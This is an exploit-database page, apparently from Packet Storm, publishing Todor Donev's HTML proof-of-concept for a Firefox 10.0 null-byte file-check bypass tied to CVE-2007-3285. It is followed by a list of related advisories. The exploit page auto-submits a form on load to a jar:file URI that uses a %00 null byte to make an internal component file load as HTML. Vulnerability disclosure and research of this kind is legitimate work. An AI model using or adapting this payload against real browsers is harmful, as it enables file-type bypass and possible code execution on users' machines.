Lucene search
Todor DonevPACKETSTORM:109580HistoryFeb 08, 2012 - 12:00 a.m.
Mozilla Firefox 10.0 Local Null Byte Bypass File Check Execution
2012-02-0800:00:00
Todor Donev
packetstormsecurity.com
26
EPSS
0.045
Percentile
92.6%
`<!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit -->
<!-- -->
<!-- Vuln risk level: Medium -->
<!-- Author: Todor Donev -->
<!-- Author mail: todor.donev@@gmail.com -->
<!-- -->
<!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: -->
<!-- URI with a dangerous extension.-->
<!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more -->
<!-- -->
<!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN -->
<!-- -->
<!-- Greetz Tsvetelina Emirska again.. =) -->
<!-- -->
<html>
<body onLoad=javascript:document.form.submit()>
<form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form">
</form>
</body>
</html>
<!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->
`
Related
seebug
seebug
Firefox URLBarη©Ίεθε€ηθΏη¨δ»£η ζ§θ‘ζΌζ΄
2007-07-20 00:00:00
ubuntucve
ubuntucve
CVE-2007-3285
2007-06-20 00:00:00
prion
prion
Type confusion
2007-06-20 19:30:00
securityvulns
securityvulns
Mozilla Foundation Security Advisory 2007-22
2007-07-19 00:00:00
Mozilla Firefox, Thunderbird, Seamonkey multiple securityvulnerabilities
2007-07-19 00:00:00
cvelist
cvelist
CVE-2007-3285
2007-06-20 19:00:00
nvd
nvd
CVE-2007-3285
2007-06-20 19:30:00
mozilla
mozilla
File type confusion due to %00 in name β Mozilla
2007-07-17 00:00:00
cve
cve
CVE-2007-3285
2007-06-20 19:30:00
ubuntu
ubuntu
Firefox vulnerabilities
2007-07-20 00:00:00
nessus
nessus
Firefox < 2.0.0.5 Multiple Vulnerabilities
2007-07-19 00:00:00
Ubuntu 6.06 LTS / 6.10 / 7.04 : firefox vulnerabilities (USN-490-1)
2007-11-10 00:00:00
Debian DSA-1337-1 : xulrunner - several vulnerabilities
2007-07-27 00:00:00
openvas
openvas
Debian Security Advisory DSA 1337-1 (xulrunner)
2008-01-17 00:00:00
Ubuntu: Security Advisory (USN-490-1)
2009-03-23 00:00:00
Ubuntu Update for firefox vulnerabilities USN-490-1
2009-03-23 00:00:00
debian
debian
[SECURITY] [DSA 1337-1] New xulrunner packages fix several vulnerabilities
2007-07-22 19:19:22
suse
suse
remote code execution in MozillaFirefox,MozillaThunderbird,Seamonkey
2007-08-02 16:31:06
Firefox update to 31.1esr (important)
2014-09-09 18:04:16